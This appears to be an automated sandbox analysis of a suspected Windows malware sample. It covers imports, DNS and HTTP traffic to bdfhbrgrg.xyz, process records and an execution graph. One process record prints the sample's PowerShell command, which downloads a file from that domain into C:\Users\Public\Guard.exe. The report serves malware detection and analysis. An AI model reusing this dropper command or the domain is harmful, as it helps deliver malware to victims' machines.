InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, IsCharLowerW, IsCharAlphaNumericW, IsCharAlphaW, GetKeyboardLayoutNameW, ClientToScreen, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, SetMenuDefaultItem, CloseClipboard, GetWindowRect, SetUserObjectSecurity, IsClipboardFormatAvailable, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, OpenClipboard, GetWindowLongPtrW
    GDI32.dllEndPath, DeleteObject, GetDeviceCaps, ExtCreatePen, StrokePath, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, GetTextExtentPoint32W, CreateCompatibleBitmap, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StretchBlt, SelectObject, CreateCompatibleDC, StrokeAndFillPath
    COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
    ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegSetValueExW, GetSecurityDescriptorDacl, GetAclInformation, RegCreateKeyExW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW, GetUserNameW
    SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
    OLEAUT32.dllVariantChangeType, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, VariantTimeToSystemTime, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, VariantInit, VariantClear, VariantCopy, SysAllocString, SafeArrayCreateVector, VarR8FromDec, SafeArrayAllocDescriptorEx, SafeArrayAllocData, SysStringLen, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, SysReAllocString, SafeArrayAccessData
    Language of compilation systemCountry where language is spokenMap
    EnglishGreat Britain
    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
    2025-01-05T08:44:51.281623+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.549704188.114.96.3443TCP
    TimestampSource PortDest PortSource IPDest IP
    Jan 5, 2025 08:44:11.694056988 CET49704443192.168.2.5188.114.96.3
    Jan 5, 2025 08:44:11.694093943 CET44349704188.114.96.3192.168.2.5
    Jan 5, 2025 08:44:11.694159985 CET49704443192.168.2.5188.114.96.3
    Jan 5, 2025 08:44:11.704973936 CET49704443192.168.2.5188.114.96.3
    Jan 5, 2025 08:44:11.704992056 CET44349704188.114.96.3192.168.2.5
    Jan 5, 2025 08:44:12.236574888 CET44349704188.114.96.3192.168.2.5
    Jan 5, 2025 08:44:12.236634016 CET49704443192.168.2.5188.114.96.3
    Jan 5, 2025 08:44:12.243561983 CET49704443192.168.2.5188.114.96.3
    Jan 5, 2025 08:44:12.243578911 CET44349704188.114.96.3192.168.2.5
    Jan 5, 2025 08:44:12.243872881 CET44349704188.114.96.3192.168.2.5
    Jan 5, 2025 08:44:12.259826899 CET49704443192.168.2.5188.114.96.3
    Jan 5, 2025 08:44:12.303334951 CET44349704188.114.96.3192.168.2.5
    Jan 5, 2025 08:44:51.281652927 CET44349704188.114.96.3192.168.2.5
    Jan 5, 2025 08:44:51.281747103 CET44349704188.114.96.3192.168.2.5
    Jan 5, 2025 08:44:51.281932116 CET49704443192.168.2.5188.114.96.3
    Jan 5, 2025 08:44:51.292736053 CET49704443192.168.2.5188.114.96.3
    TimestampSource PortDest PortSource IPDest IP
    Jan 5, 2025 08:44:11.665064096 CET5130953192.168.2.51.1.1.1
    Jan 5, 2025 08:44:11.682395935 CET53513091.1.1.1192.168.2.5
    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
    Jan 5, 2025 08:44:11.665064096 CET192.168.2.51.1.1.10xd24Standard query (0)bdfhbrgrg.xyzA (IP address)IN (0x0001)false
    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
    Jan 5, 2025 08:44:11.682395935 CET1.1.1.1192.168.2.50xd24No error (0)bdfhbrgrg.xyz188.114.96.3A (IP address)IN (0x0001)false
    Jan 5, 2025 08:44:11.682395935 CET1.1.1.1192.168.2.50xd24No error (0)bdfhbrgrg.xyz188.114.97.3A (IP address)IN (0x0001)false
    • bdfhbrgrg.xyz
    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    0192.168.2.549704188.114.96.34434996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    TimestampBytes transferredDirectionData
    2025-01-05 07:44:12 UTC166OUTGET /ImldXigH HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: bdfhbrgrg.xyz
    Connection: Keep-Alive
    2025-01-05 07:44:51 UTC944INHTTP/1.1 522
    Date: Sun, 05 Jan 2025 07:44:51 GMT
    Content-Type: text/plain; charset=UTF-8
    Content-Length: 15
    Connection: close
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Q5ojSVhqxEPVqUe3LUMRjwm4y4V2QNMz%2BL4PSVOBEjSKVCUht5QjEzD%2F0d6HecwjTOoiBpaSLSbPeCyI7LbvS8vSCQSPvt08hZ3GSMSpJaKHcxhg8acBKpc9rgFWgNk"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Frame-Options: SAMEORIGIN
    Referrer-Policy: same-origin
    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Server: cloudflare
    CF-RAY: 8fd1d77cefde41c6-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1734&min_rtt=1729&rtt_var=658&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=780&delivery_rate=1649717&cwnd=204&unsent_bytes=0&cid=7bb6ffb16a14ad40&ts=39118&x=0"
    2025-01-05 07:44:51 UTC15INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
    Data Ascii: error code: 522


    Click to jump to process

    Click to jump to process

    Click to dive into process behavior distribution

    Click to jump to process

    Target ID:0
    Start time:02:44:07
    Start date:05/01/2025
    Path:C:\Users\user\Desktop\elyho3x5zz.exe
    Wow64 process (32bit):false
    Commandline:"C:\Users\user\Desktop\elyho3x5zz.exe"
    Imagebase:0x7ff73a1d0000
    File size:1'083'904 bytes
    MD5 hash:69931884C719A49700D9B1921E915ED0
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:low
    Has exited:true

    Target ID:1
    Start time:02:44:07
    Start date:05/01/2025
    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Wow64 process (32bit):false
    Commandline:powershell -Command "Invoke-WebRequest -Uri "https://bdfhbrgrg.xyz/ImldXigH" -OutFile "C:\Users\Public\Guard.exe""
    Imagebase:0x7ff7be880000
    File size:452'608 bytes
    MD5 hash:04029E121A0CFA5991749937DD22A1D9
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:2
    Start time:02:44:07
    Start date:05/01/2025
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff6d64d0000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Reset < >

      Execution Graph

      Execution Coverage:2.1%
      Dynamic/Decrypted Code Coverage:0%
      Signature Coverage:9.1%
      Total number of Nodes:1153
      Total number of Limit Nodes:45
      execution_graph 93427 7ff73a20c51c 93428 7ff73a20c567 93427->93428 93432 7ff73a20c52b _mbstowcs_s_l 93427->93432 93435 7ff73a2055d4 15 API calls _mbstowcs_s_l 93428->93435 93430 7ff73a20c54e HeapAlloc 93431 7ff73a20c565 93430->93431 93430->93432 93432->93428 93432->93430 93434 7ff73a1f925c EnterCriticalSection LeaveCriticalSection _mbstowcs_s_l 93432->93434 93434->93432 93435->93431 93436 7ff73a1e47e1 93437 7ff73a1e4d57 93436->93437 93441 7ff73a1e47f2 93436->93441 93498 7ff73a1dee20 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93437->93498 93439 7ff73a1e4d66 93499 7ff73a1dee20 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93439->93499 93441->93439 93442 7ff73a1e4862 93441->93442 93443 7ff73a1e4df3 93441->93443 93446 7ff73a1e3c80 93442->93446 93469 7ff73a1e66c0 93442->93469 93500 7ff73a250978 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93443->93500 93447 7ff73a1e3dde 93446->93447 93448 7ff73a2305be 93446->93448 93449 7ff73a1f5114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 93446->93449 93453 7ff73a1e4aa9 93446->93453 93454 7ff73a1e4a8f 93446->93454 93455 7ff73a1e4fe7 93446->93455 93465 7ff73a22fbe9 93446->93465 93466 7ff73a1d9640 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93446->93466 93467 7ff73a1f50b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 93446->93467 93468 7ff73a1f4f0c 34 API calls __scrt_initialize_thread_safe_statics 93446->93468 93497 7ff73a1e5360 164 API calls 93446->93497 93501 7ff73a1de0a8 93446->93501 93506 7ff73a2534e4 77 API calls 2 library calls 93446->93506 93507 7ff73a2534e4 77 API calls 2 library calls 93448->93507 93449->93446 93452 7ff73a2305d1 93456 7ff73a1de0a8 4 API calls 93453->93456 93463 7ff73a1e4ac0 93453->93463 93454->93453 93457 7ff73a22fefe 93454->93457 93454->93463 93458 7ff73a1de0a8 4 API calls 93455->93458 93456->93447 93460 7ff73a1de0a8 4 API calls 93457->93460 93458->93447 93460->93463 93462 7ff73a23044f 93505 7ff73a2534e4 77 API calls 2 library calls 93465->93505 93466->93446 93467->93446 93468->93446 93470 7ff73a1e673b memcpy_s 93469->93470 93471 7ff73a231fac 93470->93471 93476 7ff73a1e6c0f 93470->93476 93478 7ff73a231fc9 93470->93478 93482 7ff73a1e6c4a 93470->93482 93484 7ff73a1e6d40 9 API calls 93470->93484 93487 7ff73a2320c1 93470->93487 93488 7ff73a1e6c78 93470->93488 93492 7ff73a232032 93470->93492 93493 7ff73a1de0a8 4 API calls 93470->93493 93495 7ff73a1e6b15 93470->93495 93508 7ff73a2563dc 93470->93508 93513 7ff73a1f4c68 93470->93513 93519 7ff73a1e3c20 93470->93519 93543 7ff73a1f5114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 93470->93543 93544 7ff73a1dec00 93470->93544 93549 7ff73a1f50b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 93470->93549 93556 7ff73a268d98 49 API calls Concurrency::wait 93470->93556 93473 7ff73a231fbe 93471->93473 93553 7ff73a26ab30 164 API calls 93471->93553 93473->93446 93477 7ff73a1e6c3d 93476->93477 93476->93478 93550 7ff73a1dee20 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93477->93550 93554 7ff73a2534e4 77 API calls 2 library calls 93478->93554 93551 7ff73a1f1fcc 164 API calls 93482->93551 93484->93470 93487->93495 93557 7ff73a2534e4 77 API calls 2 library calls 93487->93557 93552 7ff73a1ee8f4 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93488->93552 93555 7ff73a2534e4 77 API calls 2 library calls 93492->93555 93493->93470 93495->93446 93497->93446 93498->93439 93499->93443 93500->93446 93502 7ff73a1de0b6 93501->93502 93503 7ff73a1de0bb 93501->93503 93596 7ff73a1df0ec RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 93502->93596 93503->93446 93505->93462 93506->93446 93507->93452 93558 7ff73a1dd4cc 93508->93558 93512 7ff73a256404 93512->93470 93516 7ff73a1f4c2c 93513->93516 93514 7ff73a1f4c50 93514->93470 93516->93513 93516->93514 93589 7ff73a1f925c EnterCriticalSection LeaveCriticalSection _mbstowcs_s_l 93516->93589 93590 7ff73a1f5600 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 93516->93590 93591 7ff73a1f5620 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 93516->93591 93540 7ff73a1e3c80 93519->93540 93520 7ff73a2305be 93595 7ff73a2534e4 77 API calls 2 library calls 93520->93595 93523 7ff73a2305d1 93523->93470 93524 7ff73a1e4ac0 93524->93470 93525 7ff73a1e4fe7 93529 7ff73a1de0a8 4 API calls 93525->93529 93526 7ff73a1de0a8 4 API calls 93537 7ff73a1e3dde 93526->93537 93527 7ff73a22fbe9 93593 7ff73a2534e4 77 API calls 2 library calls 93527->93593 93528 7ff73a22fefe 93532 7ff73a1de0a8 4 API calls 93528->93532 93529->93537 93531 7ff73a1e4a8f 93531->93524 93531->93528 93535 7ff73a1e4aa9 93531->93535 93532->93524 93533 7ff73a1de0a8 4 API calls 93533->93540 93534 7ff73a23044f 93535->93524 93535->93526 93537->93470 93538 7ff73a1f5114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 93538->93540 93539 7ff73a1d9640 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93539->93540 93540->93520 93540->93525 93540->93527 93540->93531 93540->93533 93540->93535 93540->93537 93540->93538 93540->93539 93541 7ff73a1f4f0c 34 API calls __scrt_initialize_thread_safe_statics 93540->93541 93542 7ff73a1f50b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 93540->93542 93592 7ff73a1e5360 164 API calls 93540->93592 93594 7ff73a2534e4 77 API calls 2 library calls 93540->93594 93541->93540 93542->93540 93545 7ff73a1dec1d 93544->93545 93546 7ff73a22a5a2 93545->93546 93547 7ff73a1f4c68 4 API calls 93545->93547 93548 7ff73a1dec55 memcpy_s 93547->93548 93548->93470 93550->93482 93551->93488 93552->93488 93553->93473 93554->93495 93555->93495 93556->93470 93557->93495 93559 7ff73a1dd4f2 93558->93559 93560 7ff73a1dd50b 93558->93560 93577 7ff73a24bdec 93559->93577 93561 7ff73a1dd513 93560->93561 93562 7ff73a1dd53e 93560->93562 93580 7ff73a1f956c 31 API calls 93561->93580 93564 7ff73a229cc4 93562->93564 93565 7ff73a1dd550 93562->93565 93571 7ff73a229bbc 93562->93571 93583 7ff73a1f9538 31 API calls 93564->93583 93581 7ff73a1f4834 46 API calls 93565->93581 93567 7ff73a1dd522 93572 7ff73a1dec00 4 API calls 93567->93572 93569 7ff73a229cdc 93573 7ff73a1f4c68 4 API calls 93571->93573 93576 7ff73a229c3e wcscpy 93571->93576 93572->93559 93574 7ff73a229c0a 93573->93574 93575 7ff73a1dec00 4 API calls 93574->93575 93575->93576 93582 7ff73a1f4834 46 API calls 93576->93582 93584 7ff73a24c7c0 lstrlenW 93577->93584 93580->93567 93581->93567 93582->93564 93583->93569 93585 7ff73a24c7dd GetFileAttributesW 93584->93585 93586 7ff73a24bdf5 93584->93586 93585->93586 93587 7ff73a24c7eb FindFirstFileW 93585->93587 93586->93512 93587->93586 93588 7ff73a24c7ff FindClose 93587->93588 93588->93586 93589->93516 93591->93516 93592->93540 93593->93534 93594->93540 93595->93523 93596->93503 93597 7ff73a22b221 93598 7ff73a22b22a 93597->93598 93605 7ff73a1e0378 93597->93605 93620 7ff73a2447bc RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 93598->93620 93600 7ff73a22b241 93621 7ff73a244708 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 93600->93621 93602 7ff73a22b264 93603 7ff73a1e3c20 164 API calls 93602->93603 93604 7ff73a22b292 93603->93604 93611 7ff73a1e0405 93604->93611 93622 7ff73a268d98 49 API calls Concurrency::wait 93604->93622 93614 7ff73a1df7b8 93605->93614 93608 7ff73a22b2d9 Concurrency::wait 93608->93605 93623 7ff73a2447bc RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 93608->93623 93612 7ff73a1e070a 93611->93612 93613 7ff73a1de0a8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93611->93613 93624 7ff73a1dee20 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93611->93624 93613->93611 93616 7ff73a1df7d5 93614->93616 93615 7ff73a1df7de 93615->93611 93616->93615 93618 7ff73a1de0a8 4 API calls 93616->93618 93619 7ff73a1df7b8 4 API calls 93616->93619 93625 7ff73a1d9640 93616->93625 93618->93616 93619->93616 93620->93600 93621->93602 93622->93608 93623->93608 93624->93611 93626 7ff73a1f4c68 4 API calls 93625->93626 93627 7ff73a1d9663 93626->93627 93627->93616 93628 7ff73a1d5dec 93629 7ff73a1d5df4 93628->93629 93630 7ff73a1d5e98 93629->93630 93631 7ff73a1d5e28 93629->93631 93669 7ff73a1d5e96 93629->93669 93635 7ff73a21c229 93630->93635 93636 7ff73a1d5e9e 93630->93636 93632 7ff73a1d5e35 93631->93632 93633 7ff73a1d5f21 PostQuitMessage 93631->93633 93639 7ff73a1d5e40 93632->93639 93640 7ff73a21c2af 93632->93640 93660 7ff73a1d5e7c 93633->93660 93634 7ff73a1d5e6b DefWindowProcW 93634->93660 93684 7ff73a1eede4 8 API calls 93635->93684 93637 7ff73a1d5ea5 93636->93637 93638 7ff73a1d5ecc SetTimer RegisterWindowMessageW 93636->93638 93642 7ff73a21c1b8 93637->93642 93643 7ff73a1d5eae KillTimer 93637->93643 93644 7ff73a1d5efc CreatePopupMenu 93638->93644 93638->93660 93645 7ff73a1d5f2b 93639->93645 93646 7ff73a1d5e49 93639->93646 93696 7ff73a24a40c 16 API calls memcpy_s 93640->93696 93649 7ff73a21c1f7 MoveWindow 93642->93649 93650 7ff73a21c1bd 93642->93650 93670 7ff73a1d5d88 93643->93670 93644->93660 93674 7ff73a1f4610 93645->93674 93657 7ff73a1d5e5f 93646->93657 93658 7ff73a1d5f0b 93646->93658 93646->93669 93648 7ff73a21c255 93685 7ff73a1f2c44 47 API calls 93648->93685 93649->93660 93654 7ff73a21c1c2 93650->93654 93655 7ff73a21c1e4 SetFocus 93650->93655 93654->93657 93661 7ff73a21c1cb 93654->93661 93655->93660 93657->93634 93666 7ff73a1d5d88 Shell_NotifyIconW 93657->93666 93682 7ff73a1d5f3c 26 API calls memcpy_s 93658->93682 93659 7ff73a21c2c3 93659->93634 93659->93660 93683 7ff73a1eede4 8 API calls 93661->93683 93665 7ff73a1d5f1f 93665->93660 93667 7ff73a21c280 93666->93667 93686 7ff73a1d6258 93667->93686 93669->93634 93671 7ff73a1d5de4 93670->93671 93672 7ff73a1d5d99 memcpy_s 93670->93672 93681 7ff73a1d7098 DeleteObject DestroyWindow Concurrency::wait 93671->93681 93673 7ff73a1d5db8 Shell_NotifyIconW 93672->93673 93673->93671 93675 7ff73a1f46db 93674->93675 93676 7ff73a1f461a memcpy_s 93674->93676 93675->93660 93697 7ff73a1d72c8 93676->93697 93678 7ff73a1f46a2 KillTimer SetTimer 93678->93675 93679 7ff73a1f4660 93679->93678 93680 7ff73a23aaa1 Shell_NotifyIconW 93679->93680 93680->93678 93681->93660 93682->93665 93683->93660 93684->93648 93685->93657 93687 7ff73a1d6287 memcpy_s 93686->93687 93759 7ff73a1d61c4 93687->93759 93690 7ff73a1d632d 93692 7ff73a1d634e Shell_NotifyIconW 93690->93692 93693 7ff73a21c644 Shell_NotifyIconW 93690->93693 93694 7ff73a1d72c8 6 API calls 93692->93694 93695 7ff73a1d6365 93694->93695 93695->93669 93696->93659 93698 7ff73a1d72f4 93697->93698 93699 7ff73a1d73bc 93697->93699 93719 7ff73a1d98e8 93698->93719 93699->93679 93701 7ff73a1d7303 93702 7ff73a21cdfc LoadStringW 93701->93702 93703 7ff73a1d7310 93701->93703 93705 7ff73a21ce1e 93702->93705 93722 7ff73a1d7cf4 93703->93722 93707 7ff73a1de0a8 4 API calls 93705->93707 93706 7ff73a1d7324 93708 7ff73a1d7336 93706->93708 93709 7ff73a21ce30 93706->93709 93715 7ff73a1d734f memcpy_s wcscpy 93707->93715 93708->93705 93710 7ff73a1d7343 93708->93710 93733 7ff73a1d7c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93709->93733 93732 7ff73a1d7c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93710->93732 93713 7ff73a21ce3c 93713->93715 93734 7ff73a1d71f8 93713->93734 93717 7ff73a1d73a3 Shell_NotifyIconW 93715->93717 93716 7ff73a21ce63 93718 7ff73a1d71f8 4 API calls 93716->93718 93717->93699 93718->93715 93720 7ff73a1f4c68 4 API calls 93719->93720 93721 7ff73a1d9918 93720->93721 93721->93701 93723 7ff73a21d2c8 93722->93723 93724 7ff73a1d7d0d 93722->93724 93745 7ff73a1ddda4 93723->93745 93727 7ff73a1d7d24 93724->93727 93729 7ff73a1d7d51 93724->93729 93726 7ff73a21d2d3 93744 7ff73a1d7e4c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93727->93744 93729->93726 93731 7ff73a1f4c68 4 API calls 93729->93731 93730 7ff73a1d7d2f memcpy_s 93730->93706 93731->93730 93732->93715 93733->93713 93735 7ff73a1d721c 93734->93735 93738 7ff73a21cd0c 93734->93738 93736 7ff73a1d7274 93735->93736 93741 7ff73a21cd66 memcpy_s 93735->93741 93754 7ff73a1db960 93736->93754 93740 7ff73a1f4c68 4 API calls 93738->93740 93739 7ff73a1d7283 memcpy_s 93739->93716 93740->93741 93742 7ff73a1f4c68 4 API calls 93741->93742 93743 7ff73a21cdda memcpy_s 93742->93743 93744->93730 93746 7ff73a1ddda9 93745->93746 93748 7ff73a1dddc7 memcpy_s 93745->93748 93746->93748 93749 7ff73a1da7c0 93746->93749 93748->93726 93750 7ff73a1da7dd memcpy_s 93749->93750 93751 7ff73a1da7ed 93749->93751 93750->93748 93752 7ff73a21e7da 93751->93752 93753 7ff73a1f4c68 4 API calls 93751->93753 93753->93750 93755 7ff73a1db981 93754->93755 93758 7ff73a1db976 memcpy_s 93754->93758 93756 7ff73a1f4c68 4 API calls 93755->93756 93757 7ff73a21ef2a 93755->93757 93756->93758 93758->93739 93760 7ff73a21c5f8 93759->93760 93761 7ff73a1d61e0 93759->93761 93760->93761 93762 7ff73a21c602 DestroyIcon 93760->93762 93761->93690 93763 7ff73a24ad94 39 API calls wcsftime 93761->93763 93762->93761 93763->93690 93764 7ff73a1f8fac 93765 7ff73a1f8fd2 GetModuleHandleW 93764->93765 93766 7ff73a1f901c 93764->93766 93765->93766 93774 7ff73a1f8fdf 93765->93774 93781 7ff73a20b9bc EnterCriticalSection 93766->93781 93768 7ff73a1f90cb 93769 7ff73a20ba10 _isindst LeaveCriticalSection 93768->93769 93771 7ff73a1f90f0 93769->93771 93770 7ff73a1f9026 93770->93768 93772 7ff73a1f90a0 93770->93772 93779 7ff73a20aa8c 30 API calls 93770->93779 93773 7ff73a1f90fc 93771->93773 93778 7ff73a1f9118 11 API calls 93771->93778 93775 7ff73a1f90b8 93772->93775 93776 7ff73a20ada4 75 API calls 93772->93776 93774->93766 93782 7ff73a1f9164 GetModuleHandleExW 93774->93782 93777 7ff73a20ada4 75 API calls 93775->93777 93776->93775 93777->93768 93778->93773 93779->93772 93783 7ff73a1f91b5 93782->93783 93784 7ff73a1f918e GetProcAddress 93782->93784 93786 7ff73a1f91c5 93783->93786 93787 7ff73a1f91bf FreeLibrary 93783->93787 93784->93783 93785 7ff73a1f91a8 93784->93785 93785->93783 93786->93766 93787->93786 93788 7ff73a22f890 93797 7ff73a1de18c 93788->93797 93790 7ff73a22f8a9 93792 7ff73a22f915 93790->93792 93803 7ff73a1f2ac0 CharUpperBuffW RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93790->93803 93795 7ff73a2303e1 93792->93795 93805 7ff73a2534e4 77 API calls 2 library calls 93792->93805 93794 7ff73a22f8f6 93794->93792 93804 7ff73a251464 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93794->93804 93798 7ff73a1de1c2 93797->93798 93799 7ff73a1de1a7 93797->93799 93801 7ff73a1de1af 93798->93801 93807 7ff73a1dee20 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93798->93807 93806 7ff73a1dee20 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93799->93806 93801->93790 93803->93794 93805->93795 93806->93801 93807->93801 93808 7ff73a1e2bf8 93811 7ff73a1ded44 93808->93811 93810 7ff73a1e2c05 93812 7ff73a1ded75 93811->93812 93819 7ff73a1dedcd 93811->93819 93813 7ff73a1e3c20 164 API calls 93812->93813 93812->93819 93815 7ff73a1deda8 93813->93815 93817 7ff73a1dedfe 93815->93817 93820 7ff73a1dee20 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93815->93820 93816 7ff73a22a636 93817->93810 93819->93817 93821 7ff73a2534e4 77 API calls 2 library calls 93819->93821 93820->93819 93821->93816 93822 7ff73a22e263 93823 7ff73a22e271 93822->93823 93833 7ff73a1e2680 93822->93833 93823->93823 93824 7ff73a1e29c8 PeekMessageW 93824->93833 93825 7ff73a1e26da GetInputState 93825->93824 93825->93833 93827 7ff73a22d181 TranslateAcceleratorW 93827->93833 93828 7ff73a1e2a33 PeekMessageW 93828->93833 93829 7ff73a1e2a1f TranslateMessage DispatchMessageW 93829->93828 93830 7ff73a1e28b9 timeGetTime 93830->93833 93831 7ff73a22d2bb timeGetTime 93855 7ff73a1f2ac0 CharUpperBuffW RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93831->93855 93833->93824 93833->93825 93833->93827 93833->93828 93833->93829 93833->93830 93833->93831 93837 7ff73a1e66c0 164 API calls 93833->93837 93838 7ff73a1e2856 93833->93838 93839 7ff73a1e3c20 164 API calls 93833->93839 93840 7ff73a2534e4 77 API calls 93833->93840 93842 7ff73a1e2b70 93833->93842 93849 7ff73a1f2de8 93833->93849 93854 7ff73a1e2e30 164 API calls 2 library calls 93833->93854 93856 7ff73a253a28 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93833->93856 93857 7ff73a26a320 164 API calls Concurrency::wait 93833->93857 93837->93833 93839->93833 93840->93833 93843 7ff73a1e2b96 93842->93843 93844 7ff73a1e2ba9 93842->93844 93858 7ff73a1e2050 93843->93858 93878 7ff73a2534e4 77 API calls 2 library calls 93844->93878 93846 7ff73a1e2b9e 93846->93833 93848 7ff73a22e55c 93850 7ff73a1f2e0d 93849->93850 93853 7ff73a1f2e2a 93849->93853 93850->93833 93851 7ff73a1f2e5b IsDialogMessageW 93851->93850 93851->93853 93852 7ff73a239d94 GetClassLongPtrW 93852->93851 93852->93853 93853->93850 93853->93851 93853->93852 93854->93833 93855->93833 93856->93833 93857->93833 93859 7ff73a1e3c20 164 API calls 93858->93859 93868 7ff73a1e20a8 93859->93868 93860 7ff73a1e212d 93860->93846 93861 7ff73a22d06f 93883 7ff73a2534e4 77 API calls 2 library calls 93861->93883 93863 7ff73a22d08d 93864 7ff73a1e2552 93865 7ff73a1f4c68 4 API calls 93864->93865 93874 7ff73a1e23cb memcpy_s 93865->93874 93866 7ff73a22d036 